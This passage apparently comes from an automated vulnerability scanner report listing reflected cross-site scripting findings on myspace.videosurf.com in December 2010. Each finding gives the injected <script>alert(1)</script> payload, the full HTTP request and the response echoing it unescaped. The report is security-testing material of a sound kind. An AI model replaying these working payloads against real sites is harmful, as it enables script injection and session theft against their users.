GET /video/e-news-now-oprah-clears-up-lesbian-rumors-1247359256?b2ecd"><script>alert(1)</script>f0a2b614e24=1 HTTP/1.1
Host: myspace.videosurf.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 18:01:03 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Set-Cookie: PHPSESSID=0r9d8nik8dk2ibcl4ftho912o1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: vsb=21; expires=Sun, 11-Dec-2011 18:01:03 GMT; path=/; domain=.videosurf.com
Set-Cookie: ZR=deleted; expires=Fri, 11-Dec-2009 18:01:02 GMT; path=/; domain=.videosurf.com
Set-Cookie: ZN=deleted; expires=Fri, 11-Dec-2009 18:01:02 GMT; path=/; domain=.videosurf.com
Set-Cookie: VSID=4d03bc5f72c16; expires=Sun, 11-Dec-2011 18:01:03 GMT; path=/; domain=.videosurf.com
Set-Cookie: jack_bauer's_kills=1; path=/; domain=.videosurf.com
Set-Cookie: ATID=deleted; expires=Fri, 11-Dec-2009 18:01:02 GMT; path=/; domain=.videosurf.com
Set-Cookie: ATID=5409cc42c4b1a771f863f5dbaf7f96ae; expires=Sat, 11-Dec-2010 21:01:03 GMT; path=/; domain=.videosurf.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 50892

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xml
...[SNIP]...
<meta property="og:url" content="http://myspace.videosurf.com/video/e-news-now-oprah-clears-up-lesbian-rumors-1247359256?b2ecd"><script>alert(1)</script>f0a2b614e24=1"/>
...[SNIP]...

2.136. http://myspace.videosurf.com/video/e-news-now-oprah-clears-up-lesbian-rumors-1247359256 [vlt parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://myspace.videosurf.com
Path:   /video/e-news-now-oprah-clears-up-lesbian-rumors-1247359256

Issue detail

The value of the vlt request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 281c1"><script>alert(1)</script>e2ff8386fd8 was submitted in the vlt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /video/e-news-now-oprah-clears-up-lesbian-rumors-1247359256?vlt=myspace281c1"><script>alert(1)</script>e2ff8386fd8 HTTP/1.1
Host: myspace.videosurf.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 18:15:09 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Set-Cookie: PHPSESSID=mlp5e4trd00k5mrg5lj81uda01; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: vsb=13; expires=Sun, 11-Dec-2011 18:15:09 GMT; path=/; domain=.videosurf.com
Set-Cookie: ZR=deleted; expires=Fri, 11-Dec-2009 18:15:08 GMT; path=/; domain=.videosurf.com
Set-Cookie: ZN=deleted; expires=Fri, 11-Dec-2009 18:15:08 GMT; path=/; domain=.videosurf.com
Set-Cookie: VSID=4d03bfad52697; expires=Sun, 11-Dec-2011 18:15:09 GMT; path=/; domain=.videosurf.com
Set-Cookie: vlt_code=655537655c7514a72f0b43b4d509a3c8; expires=Sat, 11-Dec-2010 19:15:09 GMT; path=/; domain=.videosurf.com
Set-Cookie: jack_bauer's_kills=1; path=/; domain=.videosurf.com
Set-Cookie: ATID=deleted; expires=Fri, 11-Dec-2009 18:15:08 GMT; path=/; domain=.videosurf.com
Set-Cookie: ATID=d713e06b5f7d5cc4d5becbbe13355bd0; expires=Sat, 11-Dec-2010 21:15:09 GMT; path=/; domain=.videosurf.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 51095

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xml
...[SNIP]...
<meta property="og:url" content="http://myspace.videosurf.com/video/e-news-now-oprah-clears-up-lesbian-rumors-1247359256?vlt=myspace281c1"><script>alert(1)</script>e2ff8386fd8"/>
...[SNIP]...

2.137. http://myspace.videosurf.com/video/saved-by-the-belding-1247850355 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://myspace.videosurf.com
Path:   /video/saved-by-the-belding-1247850355

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b463c"><script>alert(1)</script>bb705bdfbd3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /video/saved-by-the-belding-1247850355b463c"><script>alert(1)</script>bb705bdfbd3 HTTP/1.1
Host: myspace.videosurf.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Sat, 11 Dec 2010 18:01:09 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Set-Cookie: PHPSESSID=d0qqm4ok93e0137t8sjeemai62; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: vsb=88; expires=Sun, 11-Dec-2011 18:01:09 GMT; path=/; domain=.videosurf.com
Set-Cookie: ZR=deleted; expires=Fri, 11-Dec-2009 18:01:08 GMT; path=/; domain=.videosurf.com
Set-Cookie: ZN=deleted; expires=Fri, 11-Dec-2009 18:01:08 GMT; path=/; domain=.videosurf.com
Set-Cookie: VSID=4d03bc655ef1f; expires=Sun, 11-Dec-2011 18:01:09 GMT; path=/; domain=.videosurf.com
Set-Cookie: ZR=deleted; expires=Fri, 11-Dec-2009 18:01:08 GMT; path=/; domain=.videosurf.com
Set-Cookie: ZN=deleted; expires=Fri, 11-Dec-2009 18:01:08 GMT; path=/; domain=.videosurf.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xml
...[SNIP]...
<meta property="og:url" content="http://myspace.videosurf.com/video/saved-by-the-belding-1247850355b463c"><script>alert(1)</script>bb705bdfbd3"/>
...[SNIP]...

2.138. http://myspace.videosurf.com/video/saved-by-the-belding-1247850355 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://myspace.videosurf.com
Path:   /video/saved-by-the-belding-1247850355

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 11b3c"><script>alert(1)</script>6a1ae5d1e6d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /video/saved-by-the-belding-1247850355?11b3c"><script>alert(1)</script>6a1ae5d1e6d=1 HTTP/1.1
Host: myspace.videosurf.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 18:01:00 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Set-Cookie: PHPSESSID=1209e6dboifnmmai10jpcif075; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: vsb=100; expires=Sun, 11-Dec-2011 18:01:00 GMT; path=/; domain=.videosurf.com
Set-Cookie: ZR=deleted; expires=Fri, 11-Dec-2009 18:00:59 GMT; path=/; domain=.videosurf.com
Set-Cookie: ZN=deleted; expires=Fri, 11-Dec-2009 18:00:59 GMT; path=/; domain=.videosurf.com
Set-Cookie: VSID=4d03bc5c98084; expires=Sun, 11-Dec-2011 18:01:00 GMT; path=/; domain=.videosurf.com
Set-Cookie: jack_bauer's_kills=1; path=/; domain=.videosurf.com
Set-Cookie: ATID=deleted; expires=Fri, 11-Dec-2009 18:00:59 GMT; path=/; domain=.videosurf.com
Set-Cookie: ATID=45ee8fd4e266595b3a0122fc0e81506e; expires=Sat, 11-Dec-2010 21:01:00 GMT; path=/; domain=.videosurf.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 57932

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xml
...[SNIP]...
<meta property="og:url" content="http://myspace.videosurf.com/video/saved-by-the-belding-1247850355?11b3c"><script>alert(1)</script>6a1ae5d1e6d=1"/>
...[SNIP]...

2.139. http://myspace.videosurf.com/video/saved-by-the-belding-1247850355 [vlt parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://myspace.videosurf.com
Path:   /video/saved-by-the-belding-1247850355

Issue detail

The value of the vlt request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8a71b"><script>alert(1)</script>fd17ed3156e was submitted in the vlt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /video/saved-by-the-belding-1247850355?vlt=myspace8a71b"><script>alert(1)</script>fd17ed3156e HTTP/1.1
Host: myspace.videosurf.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 18:15:08 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Set-Cookie: PHPSESSID=vqjtl07me7vaks54qblma2qrf1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: vsb=58; expires=Sun, 11-Dec-2011 18:15:08 GMT; path=/; domain=.videosurf.com
Set-Cookie: ZR=deleted; expires=Fri, 11-Dec-2009 18:15:07 GMT; path=/; domain=.videosurf.com
Set-Cookie: ZN=deleted; expires=Fri, 11-Dec-2009 18:15:07 GMT; path=/; domain=.videosurf.com
Set-Cookie: VSID=4d03bfac65096; expires=Sun, 11-Dec-2011 18:15:08 GMT; path=/; domain=.videosurf.com
Set-Cookie: vlt_code=823adae01d6ff1365236edf10d7b3390; expires=Sat, 11-Dec-2010 19:15:08 GMT; path=/; domain=.videosurf.com
Set-Cookie: jack_bauer's_kills=1; path=/; domain=.videosurf.com
Set-Cookie: ATID=deleted; expires=Fri, 11-Dec-2009 18:15:07 GMT; path=/; domain=.videosurf.com
Set-Cookie: ATID=9954151fda41b0ee361042a6a5c5eeba; expires=Sat, 11-Dec-2010 21:15:08 GMT; path=/; domain=.videosurf.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 58114

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xml
...[SNIP]...
<meta property="og:url" content="http://myspace.videosurf.com/video/saved-by-the-belding-1247850355?vlt=myspace8a71b"><script>alert(1)</script>fd17ed3156e"/>
...[SNIP]...

2.140. http://myspace.videosurf.com/video/the-creepy-hand-model-ellen-sirot-with-michaela-watkins-1247990079 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://myspace.videosurf.com
Path:   /video/the-creepy-hand-model-ellen-sirot-with-michaela-watkins-1247990079

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 58fbd"><script>alert(1)</script>eb255840b05 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /video/the-creepy-hand-model-ellen-sirot-with-michaela-watkins-124799007958fbd"><script>alert(1)</script>eb255840b05 HTTP/1.1
Host: myspace.videosurf.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Sat, 11 Dec 2010 18:01:12 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Set-Cookie: PHPSESSID=32ee104dfis9c9v2otj1agmdq6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: vsb=12; expires=Sun, 11-Dec-2011 18:01:12 GMT; path=/; domain=.videosurf.com
Set-Cookie: ZR=deleted; expires=Fri, 11-Dec-2009 18:01:11 GMT; path=/; domain=.videosurf.com
Set-Cookie: ZN=deleted; expires=Fri, 11-Dec-2009 18:01:11 GMT; path=/; domain=.videosurf.com
Set-Cookie: VSID=4d03bc685247e; expires=Sun, 11-Dec-2011 18:01:12 GMT; path=/; domain=.videosurf.com
Set-Cookie: ZR=deleted; expires=Fri, 11-Dec-2009 18:01:11 GMT; path=/; domain=.videosurf.com
Set-Cookie: ZN=deleted; expires=Fri, 11-Dec-2009 18:01:11 GMT; path=/; domain=.videosurf.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xml
...[SNIP]...
<meta property="og:url" content="http://myspace.videosurf.com/video/the-creepy-hand-model-ellen-sirot-with-michaela-watkins-124799007958fbd"><script>alert(1)</script>eb255840b05"/>
...[SNIP]...

2.141. http://myspace.videosurf.com/video/the-creepy-hand-model-ellen-sirot-with-michaela-watkins-1247990079 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://myspace.videosurf.com
Path:   /video/the-creepy-hand-model-ellen-sirot-with-michaela-watkins-1247990079

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a112e"><script>alert(1)</script>0e0865bbed4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /video/the-creepy-hand-model-ellen-sirot-with-michaela-watkins-1247990079?a112e"><script>alert(1)</script>0e0865bbed4=1 HTTP/1.1
Host: myspace.videosurf.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 18:01:03 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Set-Cookie: PHPSESSID=6o10tmo9n8lr9p93liv3048p46; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: vsb=99; expires=Sun, 11-Dec-2011 18:01:04 GMT; path=/; domain=.videosurf.com
Set-Cookie: ZR=deleted; expires=Fri, 11-Dec-2009 18:01:03 GMT; path=/; domain=.videosurf.com
Set-Cookie: ZN=deleted; expires=Fri, 11-Dec-2009 18:01:03 GMT; path=/; domain=.videosurf.com
Set-Cookie: VSID=4d03bc6009301; expires=Sun, 11-Dec-2011 18:01:04 GMT; path=/; domain=.videosurf.com
Set-Cookie: jack_bauer's_kills=1; path=/; domain=.videosurf.com
Set-Cookie: ATID=deleted; expires=Fri, 11-Dec-2009 18:01:03 GMT; path=/; domain=.videosurf.com
Set-Cookie: ATID=75cffcc820d8ad71007adf86ca9faf65; expires=Sat, 11-Dec-2010 21:01:04 GMT; path=/; domain=.videosurf.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 54663

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xml
...[SNIP]...
<meta property="og:url" content="http://myspace.videosurf.com/video/the-creepy-hand-model-ellen-sirot-with-michaela-watkins-1247990079?a112e"><script>alert(1)</script>0e0865bbed4=1"/>
...[SNIP]...

2.142. http://myspace.videosurf.com/video/the-creepy-hand-model-ellen-sirot-with-michaela-watkins-1247990079 [vlt parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://myspace.videosurf.com
Path:   /video/the-creepy-hand-model-ellen-sirot-with-michaela-watkins-1247990079

Issue detail

The value of the vlt request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c1fed"><script>alert(1)</script>d56583518f8 was submitted in the vlt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /video/the-creepy-hand-model-ellen-sirot-with-michaela-watkins-1247990079?vlt=myspacec1fed"><script>alert(1)</script>d56583518f8 HTTP/1.1
Host: myspace.videosurf.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 18:15:11 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Set-Cookie: PHPSESSID=91m6rlapmopo0937rlk1c8ht82; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: vsb=28; expires=Sun, 11-Dec-2011 18:15:11 GMT; path=/; domain=.videosurf.com
Set-Cookie: ZR=deleted; expires=Fri, 11-Dec-2009 18:15:10 GMT; path=/; domain=.videosurf.com
Set-Cookie: ZN=deleted; expires=Fri, 11-Dec-2009 18:15:10 GMT; path=/; domain=.videosurf.com
Set-Cookie: VSID=4d03bfaf32e88; expires=Sun, 11-Dec-2011 18:15:11 GMT; path=/; domain=.videosurf.com
Set-Cookie: vlt_code=d059ab68768ae8874c4c125f9bef9ed8; expires=Sat, 11-Dec-2010 19:15:11 GMT; path=/; domain=.videosurf.com
Set-Cookie: jack_bauer's_kills=1; path=/; domain=.videosurf.com
Set-Cookie: ATID=deleted; expires=Fri, 11-Dec-2009 18:15:10 GMT; path=/; domain=.videosurf.com
Set-Cookie: ATID=727ad8728ab9fb072b33e6b151ded3e9; expires=Sat, 11-Dec-2010 21:15:11 GMT; path=/; domain=.videosurf.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 54862

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xml
...[SNIP]...
<meta property="og:url" content="http://myspace.videosurf.com/video/the-creepy-hand-model-ellen-sirot-with-michaela-watkins-1247990079?vlt=myspacec1fed"><script>alert(1)</script>d56583518f8"/>
...[SNIP]...

2.143. http://myspace.videosurf.com/video/the-invisibles-part-one-seaworld-english-1239815528 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://myspace.videosurf.com
Path:   /video/the-invisibles-part-one-seaworld-english-1239815528

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d90bf"><script>alert(1)</script>b08b07e4154 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /video/the-invisibles-part-one-seaworld-english-1239815528d90bf"><script>alert(1)</script>b08b07e4154 HTTP/1.1
Host: myspace.videosurf.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Sat, 11 Dec 2010 18:01:05 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Set-Cookie: PHPSESSID=f4ourfopm4d69nneempeabt7u4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: vsb=34; expires=Sun, 11-Dec-2011 18:01:05 GMT; path=/; domain=.videosurf.com
Set-Cookie: ZR=deleted; expires=Fri, 11-Dec-2009 18:01:04 GMT; path=/; domain=.videosurf.com
Set-Cookie: ZN=deleted; expires=Fri, 11-Dec-2009 18:01:04 GMT; path=/; domain=.videosurf.com
Set-Cookie: VSID=4d03bc6125138; expires=Sun, 11-Dec-2011 18:01:05 GMT; path=/; domain=.videosurf.com
Set-Cookie: ZR=deleted; expires=Fri, 11-Dec-2009 18:01:04 GMT; path=/; domain=.videosurf.com
Set-Cookie: ZN=deleted; expires=Fri, 11-Dec-2009 18:01:04 GMT; path=/; domain=.videosurf.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xml
...[SNIP]...
<meta property="og:url" content="http://myspace.videosurf.com/video/the-invisibles-part-one-seaworld-english-1239815528d90bf"><script>alert(1)</script>b08b07e4154"/>
...[SNIP]...

2.144. http://myspace.videosurf.com/video/the-invisibles-part-one-seaworld-english-1239815528 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://myspace.videosurf.com
Path:   /video/the-invisibles-part-one-seaworld-english-1239815528

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f62dd"><script>alert(1)</script>f13f92228eb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /video/the-invisibles-part-one-seaworld-english-1239815528?f62dd"><script>alert(1)</script>f13f92228eb=1 HTTP/1.1
Host: myspace.videosurf.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 18:00:57 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Set-Cookie: PHPSESSID=9fj3svk3efbh44r9i9v2b7bmp1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: vsb=6; expires=Sun, 11-Dec-2011 18:00:57 GMT; path=/; domain=.videosurf.com
Set-Cookie: ZR=deleted; expires=Fri, 11-Dec-2009 18:00:56 GMT; path=/; domain=.videosurf.com
Set-Cookie: ZN=deleted; expires=Fri, 11-Dec-2009 18:00:56 GMT; path=/; domain=.videosurf.com
Set-Cookie: VSID=4d03bc59e1b5e; expires=Sun, 11-Dec-2011 18:00:57 GMT; path=/; domain=.videosurf.com
Set-Cookie: jack_bauer's_kills=1; path=/; domain=.videosurf.com
Set-Cookie: ATID=deleted; expires=Fri, 11-Dec-2009 18:00:56 GMT; path=/; domain=.videosurf.com
Set-Cookie: ATID=d407a0c384bd35ff330acf8831916137; expires=Sat, 11-Dec-2010 21:00:57 GMT; path=/; domain=.videosurf.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 49162

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xml
...[SNIP]...
<meta property="og:url" content="http://myspace.videosurf.com/video/the-invisibles-part-one-seaworld-english-1239815528?f62dd"><script>alert(1)</script>f13f92228eb=1"/>
...[SNIP]...

2.145. http://myspace.videosurf.com/video/the-invisibles-part-one-seaworld-english-1239815528 [vlt parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://myspace.videosurf.com
Path:   /video/the-invisibles-part-one-seaworld-english-1239815528

Issue detail

The value of the vlt request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3dc97"><script>alert(1)</script>4f0431d3213 was submitted in the vlt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /video/the-invisibles-part-one-seaworld-english-1239815528?vlt=myspace3dc97"><script>alert(1)</script>4f0431d3213 HTTP/1.1
Host: myspace.videosurf.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 18:15:05 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Set-Cookie: PHPSESSID=ep1k5dcf3fubc88lomd3ag2b83; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: vsb=27; expires=Sun, 11-Dec-2011 18:15:05 GMT; path=/; domain=.videosurf.com
Set-Cookie: ZR=deleted; expires=Fri, 11-Dec-2009 18:15:04 GMT; path=/; domain=.videosurf.com
Set-Cookie: ZN=deleted; expires=Fri, 11-Dec-2009 18:15:04 GMT; path=/; domain=.videosurf.com
Set-Cookie: VSID=4d03bfa958828; expires=Sun, 11-Dec-2011 18:15:05 GMT; path=/; domain=.videosurf.com
Set-Cookie: vlt_code=ae3282ede261effa45b7e28624df7aee; expires=Sat, 11-Dec-2010 19:15:05 GMT; path=/; domain=.videosurf.com
Set-Cookie: jack_bauer's_kills=1; path=/; domain=.videosurf.com
Set-Cookie: ATID=deleted; expires=Fri, 11-Dec-2009 18:15:04 GMT; path=/; domain=.videosurf.com
Set-Cookie: ATID=47951cdd4ea831f04b99e107848129db; expires=Sat, 11-Dec-2010 21:15:05 GMT; path=/; domain=.videosurf.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 49245

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xml
...[SNIP]...
<meta property="og:url" content="http://myspace.videosurf.com/video/the-invisibles-part-one-seaworld-english-1239815528?vlt=myspace3dc97"><script>alert(1)</script>4f0431d3213"/>
...[SNIP]...

2.146. http://myspace.videosurf.com/videos/' [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://myspace.videosurf.com
Path:   /videos/'

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f52e6"><script>alert(1)</script>b84ec9d5f23 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /videosf52e6"><script>alert(1)</script>b84ec9d5f23/' HTTP/1.1
Host: myspace.videosurf.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Sat, 11 Dec 2010 18:15:14 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Set-Cookie: PHPSESSID=rf8u5o9boog28n8u4k4ekpb0i7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: vsb=90; expires=Sun, 11-Dec-2011 18:15:14 GMT; path=/; domain=.videosurf.com
